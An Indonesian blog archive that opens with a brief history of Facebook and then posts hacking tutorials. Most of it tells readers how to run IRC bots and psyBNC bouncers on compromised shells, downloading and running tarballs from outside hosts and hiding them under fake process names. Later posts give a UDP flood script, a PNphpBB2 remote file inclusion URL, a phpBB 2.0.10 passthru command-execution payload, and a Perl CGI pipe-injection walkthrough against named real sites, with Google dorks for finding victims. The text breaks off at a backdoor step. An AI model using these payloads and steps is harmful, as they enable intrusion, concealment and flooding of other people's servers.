Sabtu, 25 Juli 2009

Penemu Facebook

Diposting oleh Ranieqyu di 21.35 0 komentar
Facebook diluncurkan pertama kali pada tanggal 4 Februari 2004 oleh Mark Zuckerberg sebagai media untuk saling mengenal bagi para mahasiswa Harvard.

Dalam waktu dua minggu setelah diluncurkan, separuh dari semua mahasiswa Harvard telah mendaftar dan memiliki account di Facebook. Tak hanya itu, beberapa kampus lain di sekitar Harvard pun meminta untuk dimasukkan dalam jaringan Facebook.

Zuckerberg pun akhirnya meminta bantuan dua temannya untuk membantu mengembangkan Facebook dan memenuhi permintaan kampus-kampus lain untuk bergabung dalam jaringannya. Dalam waktu 4 bulan semenjak diluncurkan, Facebook telah memiliki 30 kampus dalam jaringannya.

Dengan kesuksesannya tersebut, Zuckerberg beserta dua orang temannya memutuskan untuk pindah ke Palo Alto dan menyewa apartemen di sana.

Setelah beberapa minggu di Palo Alto. Zuckerberg berhasil bertemu dengan Sean Parker (cofounder Napster), dan dari hasil pertemuan tersebut Parker pun setuju pindah ke apartemen Facebook untuk bekerja sama mengembangkan Facebook. Tidak lama setelah itu, Parker berhasil mendapatkan Peter Thiel (cofounder Paypal) sebagai investor pertamanya. Thiel menginvestasikan 500 ribu US Dollar untuk pengembangan Facebook.

Jumlah account di Facebook terus melonjak, sehingga pada pertengahan 2004 Friendster mengajukan tawaran kepada Zuckerberg untuk membeli Facebook seharga 10 juta US Dollar, dan Zuckerberg pun menolaknya. Zuckerberg sama sekali tidak menyesal menolak tawaran tersebut sebab tak lama setelah itu Facebook menerima sokongan dana lagi sebesar 12.7 juta US Dollar dari Accel Partners. Dan semenjak itu so

Rabu, 22 Juli 2009

Belajar Psybnc & Bot Di mIRC

Diposting oleh Ranieqyu di 23.07 0 komentar
Untuk dapat membuat bot dan psybNC, kamu harus punya shell yang bagus
lebih bagus lagi kamu pegang akses root....

klu kamu belum punya shell yang bagus dapet di ambil di

http://www.manadocoding.com/forum/viewtopic.php?t=1627

ok sekaran kita mulai caranya ...

Cara Praktis membuat bot dan psyBNC di dalnet

==========================
command2 Dasar server Linux dan FreebSD:
1. uname -a;id <<== untuk melihat jenis server dan id 2. /sbin/ifconfig | grep inet<<== untuk melihat ip server 3. find / -type d -perm 777 <<== untuk melihat direktori yg tidak permission denied 4. mkdir <<== untuk membuat direktori baru example: mkdir love 5. ls -alF <<== untuk melihat semua file dalam sebuah direktory 6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server cara membuat bot dari server Linux: 1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/acz.tgz
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt

cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt

cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
kalau uda dirun coba join ke #samudra lalu test portcheck.. example `pc (nomerIP) (PORT)

cara load psy dari server FreeBsd:

1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run

bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server Linux
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufi.tar.gz
2. cd /var/tmp;tar -zxvf Gufi.tar.gz
3. cd /var/tmp rm -fr Gufi.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh

bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server FreeBsd
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufibsd.tar.gz
2. cd /var/tmp;tar -zxvf Gufibsd.tar.gz
3. cd /var/tmp rm -fr Gufibsd.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh


sedikit saran
klu mau buat bot dan psyBNC, jangan terlalu banyak buatnya
dalam 1 shell injeck, soalnya nanti di kill ama dalnet

Installasi PsyBNC pada OS Windows

=================================
Instalasi psyBNC2.3.1 For Windows
=================================
DOWNLOAD
File : psybnc2.3.1.exe
http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe

INSTALASI
1. Extact file psybnc2.3.1.exe pada direktory C:
2. Masuk pada direktory C:psybnc
3. Anda juga dapat merubah portnya dengan menggunakan editor text seperti Notepad Wordpad atau
yang lain, C:psybnc cari file dengan nama psybnc.conf | klik kanan | Open With ..
pada kolom [ ] Always use this program to open this file jangan di beri tanda centang
4. save : file ==>> save
5. Klik Start ==>> Run ==>> Command
6. Ikuti langkah berikut pada MS-DOS Prompt =

Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.

C:WINDOWSDesktop>cd..

C:WINDOWS>cd..

C:>cd psybnc..

C:psybnc>psybnc.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ / / | o || | || ,–’
| _/ _ / | o< | | || |__ |_| |____/ |__| |___||_| _| ___| Version 2.3.1 (c) 1999-2002 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’ Configuration File: psybnc.conf Language File: psyBNC Language File - English No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 31337 psyBNC2.3.1-cBtITLdDMSNp started (PID 2080107) C:psybnc>

7. Buka mIRC
8. Ubah IDENT pada mIRC Option sesuai dengan keinginan Anda
9.
Ketik /server IP Komputer Anda 31337 <<== ini port standard (belum dirubah) -Welcome- psyBNC2.3.1 - –psyBNC- Your IRC Client did not supporrrt a password. Please type /QUOTE PASS
yourpassword to connect.
-

8. /QUOTE PASS (pass yang Anda inginkan)
9. /addserver mesra-e.dal.net:6667
/addserver hotspeed.dal.net:6667

Untuk Setting psyBNC selanjutnya Anda dapat melihatnya di:

http://geocities.com/erahman2001/setingpsy

=====================================================
psyBNC Under Windows Anda Autorun
=====================================================

=========================================================
Menjalankan psyBNC Saat Memulai Windows (using start up)
=========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, dapat menggunakan fasilitas
Start Up di start menu. Caranya cukup simpel, yaitu sbb :

Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka windows Explorer, dan masuk ke direktory C:WINDOWSStart MenuProgramsStartUp
2. Buat shortcut untuk PsyBNC dengan mengklik kanan di area yang kosong, kemudian pilih
New >> ShortCut
3. Buat command line untuk notepad yaitu C:psybncpsybnc.exe atau pilih Browse
4. Klik tombol Next, kemudian Finish
5. Restart PC dan Windows akan otomatis menjalankan psybnc.

========================================================
Menjalankan psyBNC Saat Memulai Windows (using registry)
========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, sebenarnya kita dapat menggunakan
fasilitas Start Up. Tetapi ada cara yang lebih advanced, yaitu dengan menggunakan registry.
Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka Registry dengan Regedit : klik Start|Run| ketik Regedit | klik OK
2. Buka key [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
Pilih Edit | New | String Value, dan beri nama C:psybncpsybnc.exe
3. Isi valuenya dengan ‘C:psybncpsybnc.exe’
4. Restart PC

=======================================================
Menjalankan psyBNC Saat Memulai Windows (using Win.ini)
=======================================================

Ini adalah cara yang lain untuk memaksa Windows menjalankan program yang kita inginkan. Dua cara
yang lain adalah dengan cara klasik yaitu dengan Start Up menu dan dengan cara yang advanced
yaitu dengan menggunakan registry.

Cara ini menggunakan file sistem Windows yaitu Win.ini. Berikut ini adalah hal - hal yang perlu
pembaca lakukan untuk menjalankan program secara otomatis dengan menggunakan file Win.ini.
Diasumsikan program yang akan dijalankan adalah psybnc.exe yang ada di direktori C:psybnc.

1. Carilah file Win.ini yang berada di diirektori C:Windows
2. Buka dengan menggunakan editor text seeperti Notepad atau yang lain
3. Carilah entri yang bernama “load”
4. Kemudian isi dengan ‘C:psybncpsybnc.exe’, sehingga lengkapnya
menjadi “load=C:psybncpsybnc.exe”
5. Pilih menu File > Save, dan restart PC

Mudah khan ??
Selamat mencoba !!!

Pasang Psybnc

ok kita ambil contoh file ini
http://www.psybnc.info/download/psybnc2.3.2-4b.exe
file size sekitar 750kb.
kita taruh di c:/

double klik file psybnc2.3.2-4b.exe
lalu akan ada dialog extract to c:\psybnc\ ikuti saja dengan klik tombol extract
setelah sukses ada kotak pesan “successfully completed the operation” klik ok
sekarang kita double klik folder c:\psybnc

disitu kita lihat ada file psybnc.exe dan ada psybnc.conf
disini kita bisa edit dulu file psybnc.conf jika ingin merubah port nya yang
defaultnya adalah 31337
berikut contoh pada file psybnc.conf
=================================
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
=================================
baris pertama artinya psybnc listen pada port 31337 artinya nanti kita konek ke port 3317
barius kedua adalah ip listen bisa kita isikan ip dari ipkomputer yang kita install psybnc atau kita beri tanda bintang
yang artinya semua ip terdeteksi di system.
baris ketiga adalah host allow, artinya semua ip bisa loggin ke psybnc kita. jika kita spesifikasikan
ipnya misal psybnc.HOSTALLOWS.ENTRY=*.* kita beri suatu ip

ok kita anggap selesai psybnc.conf jika masih bingung biarkan saja seperti aslinya.
langkah selanjutnya kita double klik psybnc.exe
dan psybnc.exe akan dijalankan muncul dos prompt sekilas lalu menghilang bisa kalian check psybnc.exe sudah jalan lewat menu task manager

sekarang kita pergi ke mirc ( program chating favoritku :P~)

kita konek ke psybnc kita.
disini saya contohkan ip psybnc adalah 192.168.0.83 dengan port 31337 ident pertama kali bebas dan password kosong jika memakai psybnc.conf default diatas.

di mirc kita pilih options atau gambar palu di kiri atas.
isikan
full name : nama anda
email address: admin@
nickname : nickmu
alternative: nick-lain

klik ok

di status ketik perintah konek berikut
/server 192.168.0.83:31337 <<<<>Please type /QUOTE PASS yourpassword to connect.

/QUOTE PASS 123456 <<<> Welcome xxx !
<-psyBNC> You are the first to connect to this new proxy server.
<-psyBNC> You are the proxy-admin. Use ADDSERVER to add a server so the bouncer may connect.
<-psyBNC> psyBNC2.3.2-4 Help (* = BounceAdmin only)
<-psyBNC> ————————————–
<-psyBNC> BHELP BWHO - Lists all Users on the Bouncer
<-psyBNC> BHELP PASSWORD - Sets your or another Users Password(Admin)
<-psyBNC> BHELP BVHOST - Sets your vhost to connect thru
<-psyBNC> BHELP PROXY - Sets your proxy to connect thru
<-psyBNC> BHELP SETUSERNAME - Sets your User Name
<-psyBNC> BHELP SETAWAY - Sets your away-Text when you leave
<-psyBNC> BHELP SETLEAVEMSG - Sets your Leave-MSG when you leave
<-psyBNC> BHELP LEAVEQUIT - If set to 1, parts all channels on quit
<-psyBNC> BHELP SETAWAYNICK - Sets your nick when you are offline
<-psyBNC> BHELP JUMP - Jumps to the next IRC-Server
<-psyBNC> BHELP BQUIT - Quits your current Server Connection
<-psyBNC> BHELP BCONNECT - Reconnects a bquitted Connection
<-psyBNC> BHELP AIDLE - Enables/Disables Antiidle
<-psyBNC> BHELP AUTOREJOIN - Enables/Disables Auto-Rejoin
<-psyBNC> BHELP ADDSERVER - Adds an IRC-Server to your Serverlist
<-psyBNC> BHELP DELSERVER - Deletes an IRC-Server by number
<-psyBNC> BHELP LISTSERVERS - Lists all IRC-Servers added
<-psyBNC> BHELP ADDNETWORK - Adds a seperate Network to your client
<-psyBNC> BHELP DELNETWORK - Deletes a Network from your client
<-psyBNC> BHELP SWITCHNET - Switches to a given Network
<-psyBNC> BHELP ADDOP - Adds a User who may get Op from you
<-psyBNC> BHELP DELOP - Deletes an added User who got Op
<-psyBNC> BHELP LISTOPS - Lists all added Ops
<-psyBNC> BHELP ADDAUTOOP - Adds a User who gets Auto-Op from you
<-psyBNC> BHELP DELAUTOOP - Deletes an added User who got Op
<-psyBNC> BHELP LISTAUTOOPS - Lists all added Auto-Ops
<-psyBNC> BHELP ADDBAN - Adds a ban (global or to a channel)
<-psyBNC> BHELP DELBAN - Deletes a ban by Number
<-psyBNC> BHELP LISTBANS - Lists all bans
<-psyBNC> BHELP ADDASK - Adds a host/bot to ask Op from
<-psyBNC> BHELP DELASK - Deletes a host/bot to ask Op by Number
<-psyBNC> BHELP LISTASK - Lists the hosts/bots to ask Op from
<-psyBNC> BHELP ADDIGNORE - Adds a hostmask/contentfilter to the ignores
<-psyBNC> BHELP DELIGNORE - Deletes a hostmask/contentfilter from the ignores
<-psyBNC> BHELP LISTIGNORES - Lists the currently added ignores
<-psyBNC> BHELP ADDDCC - Adds a DCC-Connection to a bot
<-psyBNC> BHELP LISTDCC - Lists all added DCC-Connectionc
<-psyBNC> BHELP DELDCC - Deletes a DCC-Connection by number
<-psyBNC> BHELP DCCCHAT - Offers a DCC Chat to a given IRC User
<-psyBNC> BHELP DCCANSWER - Answers to a DCC Chat-Request
<-psyBNC> BHELP DCCENABLE - Enables/Disables DCC thru psybnc
<-psyBNC> BHELP DCCSEND - Sends a file to a given IRC User
<-psyBNC> BHELP DCCGET - Gets a DCC Send File from an IRC User
<-psyBNC> BHELP DCCSENDME - Sends the bouncer User a File
<-psyBNC> BHELP AUTOGETDCC - always get offered Files
<-psyBNC> BHELP DCCCANCEL - Cancels a dccchat or a transfer
<-psyBNC> BHELP PLAYPRIVATELOG - Plays your Message Log
<-psyBNC> BHELP ERASEPRIVATELOG - Erases your Message Log
<-psyBNC> BHELP ADDLOG - Adds a Log source / filter
<-psyBNC> BHELP DELLOG - Deletes a Log source by number
<-psyBNC> BHELP LISTLOGS - Lists all added Log sources/filters
<-psyBNC> BHELP PLAYTRAFFICLOG - Plays the Traffic Log
<-psyBNC> BHELP ERASETRAFFICLOG - Erases the Traffic Log
<-psyBNC> BHELP ENCRYPT - Encrypts talk to a given channel/user
<-psyBNC> BHELP DELENCRYPT - Deletes an encryption entry by number
<-psyBNC> BHELP LISTENCRYPT - Shows a List of encrypted talks
<-psyBNC> BHELP TRANSLATE - Adds a translator to/from channels/users
<-psyBNC> BHELP DELTRANSLATE - Deletes a translator by number
<-psyBNC> BHELP LISTTRANSLATE - Shows a List of translated talks
<-psyBNC> BHELP * BREHASH - Rehashes the proxy and resets all Connections
<-psyBNC> BHELP * MADMIN - Gives a User an Admin flag
<-psyBNC> BHELP * UNADMIN - Removes the Admin flag from a User
<-psyBNC> BHELP * BKILL - Kills a User from the proxy
<-psyBNC> BHELP * SOCKSTAT - Shows/Logs the current Connections
<-psyBNC> BHELP * ADDUSER - Adds a new User to the Bouncer
<-psyBNC> BHELP * DELUSER - Deletes a User from the Bouncer
<-psyBNC> BHELP * NAMEBOUNCER - Names your bouncer (needed for linking)
<-psyBNC> BHELP * LINKTO - Adds a bouncer Link to the Host/Port
<-psyBNC> BHELP * LINKFROM - Adds a bouncer Link from your Bouncer
<-psyBNC> BHELP * RELAYLINK - Allows or disables a relayable Link
<-psyBNC> BHELP * DELLINK - Deletes a Link to a bouncer
<-psyBNC> BHELP LISTLINKS - Lists all Links to/from the Bouncer
<-psyBNC> BHELP * RELINK - Resets a link to a bouncer by number
<-psyBNC> BHELP * PLAYMAINLOG - Plays the Connection Log
<-psyBNC> BHELP * ERASEMAINLOG - Erases the Connection Log
<-psyBNC> BHELP * ADDALLOW - Adds a host allow to connect
<-psyBNC> BHELP * DELALLOW - Deletes a host allow
<-psyBNC> BHELP * LISTALLOW - Lists the host allows on your proxy
<-psyBNC> BHELP SRELOAD - Reloads the Script for the User
<-psyBNC> BHELP LISTTASKS - Lists the current running tasks
<-psyBNC> BHELP * SETLANG - Sets the language (global)
<-psyBNC> BHELP BHELP - Lists this help or help on a topic
<-psyBNC> BHELP Use /QUOTE bhelp for details.
<-psyBNC> BHELP - End of help
<-psyBNC> Fri Jan 4 17:34:25 :New User:admin (xxx) added by admin
<-psyBNC> Fri Jan 4 17:34:31 :User admin () has no server added

——————————————————————
lalu kita ketik
/addserver irc.dal.net:6667 <<<> Server irc.dal.net port 6667 (password: None) added.
<-psyBNC> Fri Jan 4 17:37:31 :User admin () trying irc.dal.net port 6667 ().
<-psyBNC> Fri Jan 4 17:37:32 :User admin () connected to irc.dal.net:6667 ()

Perintah2 dalam penggunaan psyBNC

Perintah2 dalam penggunaan psyBNC

/server (alamat shell anda)(port)
/quote pass (password psyBNC anda)

contohnya:
/server ltnx.com 1979
/quote pass klowor
Setelah melakukan tahap-tahap di atas anda dapat melakukan arahan-arahan yang ada dalam psyBNC anda sebagai berikut:

/BHELP
Arahan di atas adalah untuk menampilkan menu-menu atau arahan-arahan yang ada pada psyBNC yang anda pakai tersebut.

/BWHO
Digunakan untuk melihat daftar orang-orang atau user yang sedang menggunakan psyBNC yang satu account dengan psyBNC anda.

/ADDUSER
Berfungsi untuk menambah user/pengguna baru dalam account psyBNC anda. Hanya admin psyBNC saja yang boleh memakai arahan ini.
Contoh:
/ADDUSER ident:username (/adduser senthod:phatygeni)

/DELUSER
Untuk menghapus user/pengguna tertentu yang ada dalam account psyBNC anda. Hanya admin yang boleh menghapus user/pengguna.
Contoh:
/DELUSER ident (/deluser senthod)

/BKILL
Untuk meng-kill atau memutus connection user tertentu yang ada di dalam account psyBNC anda tetapi arahan ini tidak akan
menghapus user tersebut tapi hanya akan membuat user disconnect atau putus putus connection untuk sementara.
Hanya admin psyBNC saja yang dapat melakukan arahan ini.

/PASSWORD
Digunakan untuk menukar password atau kata rahsia pada psyBNC anda apabila anda khuatir password anda akan mudah diterka
oleh orang atau pun telah diketahui oleh orang yang tidak anda kehendaki.
Contoh:
/password
/password ole-ole

/ADDSERVER
Untuk memasukkan server-server yang anda kehendaki, misalnya irc.dal.net 6667
Contoh:
/addserver irc.dal.net:6667

/DELSERVER
Digunakan untuk memadamkan server yang ada pada daftar/list pada psyBNC anda.
Contoh:
/delserver 1 (tergantung nomor server pada daftar server yang ada di psyBNC anda)

/LISTSERVERS
Untuk melihat daftar server yang ada pada psyBNC anda.

/JUMP
Untuk menukar atau mengganti server yang anda pakai ke server berikutnya yang ada
pada daftar (list) pada psy-BNC anda yang anda set sewaktu anda pertama kali menggunakan PSYBNC.

/BQUIT
Untuk keluar dari network atau memutuskan sambungan dari server IRC dan nick anda akan tidak terpampang di channel sebelum anda connectkan kembali.

/BCONNECT
Untuk menyambung kembali ke network/server IRC setelah anda melakukan arahan /BQUIT supaya nick anda boleh terpampang kembali pada Channel IRC anda.

/SETAWAY
Arahan ini untuk menampilkan pesan anda ketika anda tidak di dalam IRC atau tidak online. Pesan ini akan nampak bila nick anda
di-whois-kan oleh rakan anda atau user lain yang ingin mengetahui status anda.
Contoh:
/setaway (pesan anda)
/setaway maaf saya sedang berbulan madu jadi belum boleh online dalam waktu ini

/SETAWAYNICK
Untuk mengubah atau menukar nick anda ketika anda keluar dari IRC (offline)
Contoh:
/setaway (nick)
/setaway KUJANG^AFK

/SETLEAVEMSG
Untuk menampilkan teks atau pesan anda ketika anda keluar dari IRC (offline.)
Contoh:
/setleavemsg (pesan)
/setleavemsg Sorry, sila tinggalkan pesanan suara anda....!!

/SETUSERNAME
Untuk mengganti user name yang tampil setelah IP address anda ketika di-whois.
Contoh:
/setusername (nama yang anda kehendaki)
/setusername sontoloyo

/VHOST
Untuk mengganti Vhost (Virtual Host) atau IP address psyBNC anda ke Vhost yang anda kehendaki.
Virtual Host atau Vhost adalah address yang anda gunakan pada ketika anda online.
Contoh:
/vhost (vhost yang anda kehendaki dan disediakan oleh shell anda)
/vhost aston.crack.in.the.box.shell.org

/PLAYPRIVATELOG
Untuk menampilkan pesan-pesan untuk anda selama anda tidak berada di IRC (offline),
pesan ini dapat dirakam secara automatik ketika seseorang melakukan msg atau private msg.
Untuk menggunakan arahan ini anda hanya cukup me-layprivatelog maka automatik akan tampil pesan-pesan untuk anda dalam sebuah windows
dengan nama psyBNC atau message.

/ERASEPRIVATELOG
Untuk menghapus privatelog atau pesan yang telah anda baca dan anda tidak membutuhkan pesan-pesan itu lagi.

Cara Mudah Untuk membuat BOT

Cara Pertama:

NB: BOT Ini akan otomatis jalan pada server dalnet " khusus Untuk dalnet server "
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl 2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2 3. cd .kin 4. ./creat fileconf nick ident IP channel owner contoh: ./creat defaced Mr_Lam3r 212.88.174.3 defaced dr_zig defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya) Mr_Lam3r ...............nick bot dr_zig ...................ident bot 212.88.174.3 .......IP shell defaced ..................... nama channel, jangan pake # dr_zig ................ nick owner catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash) contoh: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat

contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :

2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel

Cara Kedua:

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth

Cara Buat Psy Dari shell

cd /var/tmp
mkdir ...
cd ...
pwd
wget www.acspakistan.com/sh/aris.tar.gz
tar -zxvf aris.tar.gz
cd ChuCu
./config
./fuck
./run
########################

Cara Buat Bot

wget http://www.discountcarshop.co.uk/data/sh/basica.tar.gz
curl -f -O http://www.discountcarshop.co.uk/data/sh/basica.tar.gz
tar -zxvf basica.tar.tz
cd scripts
rm -fr ary.tcl
curl -f -O http://www.discountcarshop.co.uk/data/sh/netgate.tcl
mv netgate.tcl ary.tcl
cd ..
./serly fileconf nick ident IP channel owner
./serly a.txt asen-keren ident 209.59.132.199 green^hause AseN
./run a.txt /usr/local/apache/bin/httpd
########################

Cara Bindtykan phpBB2 Ke Putty
cd /tmp;wget geocities.com/c0_pampers/as.tar.gz
cd /tmp;curl -f -O geocities.com/c0_pampers/as.tar.gz
cd /tmp;tar -zxvf as.tar.gz
cd /tmp/.asen;./fuck;./run
cd /tmp/awyeah;./fuck
cd /tmp/awyeah;./run

Nb: netstat -a <- Buat Liat Port ########################## Cara Buat Cgi dari Shell
01. Login Shell
02. wget www.geocities.com/wisen_asen/a.pl
03. ftp
04. login
05. Pasword
06. User
07. cd www
08. 250 CWD command successful
09. ls -alF
10. mput a.pl
11. chmod 755 a.pl

##########################

Buat Tembak Ip Org Dari Shell
wget geocities.com/kupu2hitamputih/udppl.txt
mv udppl.txt AseN.pl
chmod 755 AseN.pl
perl AseN.pl 60000 60000


http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe <-------- psy

posted by HAIDIR @ 7:24 AM 0 comments


Saturday, August 27, 2005

Hacking PNPhpbb

Hacking PNphpBB2

1. Gunakan paman google, cari situs yang menggunakan PNphpBB2
keywordnya = allinurl:pnphpbb2 site:ru

2. Masuk ke halaman utama situs sasaran. -->> http://sasaran.ru

3. Tambahkan address-nya sehingga menjadi
http://sasaran.ru/modules/PNphpBB2/includes/function_admin.php?phpbb_root_path=http://nobodycare.com/php.jpg?

4. Jika yang muncul adalah php injection, selamat anda telah berhasil masuk ke dalam system korban. :-)

posted by HAIDIR @ 10:28 AM 0 comments



Hacking PHPBB 2.0.10

hacking phpbb 2.0.10

1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0
Jangan menggunakan keyword viewtopic karena gak akan diijinkan.

2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis
http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)

3. Kemudian pada bagian address coba tambahkan &highlight=%2527
http://sasaran.com/viewtopic.php?t=4&highlight=%2527

4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong).
Jika tidak, cari sasaran lain. :-)

5. Setelah Muncul error coba tambahkan lagi menjadi

http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al

6.
Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran

7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.

Contoh forum yang vuln :
http://batam.linux.or.id/forumlinux/viewtopic.php?t=19

posted by HAIDIR @ 10:19 AM 0 comments


Thursday, August 25, 2005

CGI - Perl Exploit

EXPLOITASI COMMAND EXECUTION DI PERL / CGI
by BLAHPLOK aka CHOI


Khusus buat #e-c-ho, #indonesiahack, #jambihackerlink

Disini nggak akan dijelaskan mengapa command execution ini bisa terjadi,
Kalo ingin mengcari tahu, silahkan mencari di google dan baca …
So, Kita langsung ajah….

SATU :
Mencari Target…
1. Buka Opera, internet explorer, mozilla dll
2. Masukkan alamat www.google.com di address bar
3. Masukkan keyword pencarian.
Catatan :
Trick menggunakan keyword dalam mencari bug cgi / perl :
a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari
b. Gunakan key “allinurl:”
c. Gunakan tanda petik ganda (“) jika diperlukan
contoh 1:
allinurl: “news.cgi?news=” txt
Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan
Di buka yakni file dengan ektensi txt.
Contoh 2 :
allinurl: cgi action dat
ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang
didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan
parameter action dan membuka file dengan ektensi dat.
(dengan key inilah bug WPS_SHOPPING ditemukan).
4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini
kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search
dan hasilnya ………………………………………..:

DUA:
Exploitasi:

1. Sekarang kita masuk ke exploitasi :
Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua
Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan
dibuka.
Sebagai contoh:
Sekarang kita lihat url pada halaman pertama, yakni :
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0
Klick kanan url tersebut dan klick open in new window.
Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting
tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni :
file=.file0011.dat|ls|
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0
(ls dalam command di linux shell adalah sama dengan dir pada windows, yakni
melihat seluruh file directory aktif)
yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan,
yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu
artinya webserver tersebut vulnerable untuk di hack…!!!!
Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’
Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat.
Yupe, sekarang coba kita lihat id kita:
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0
hasilnya : uid = bla bla bla
Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.

2. Memasukkan backdoor. (web backdoor)
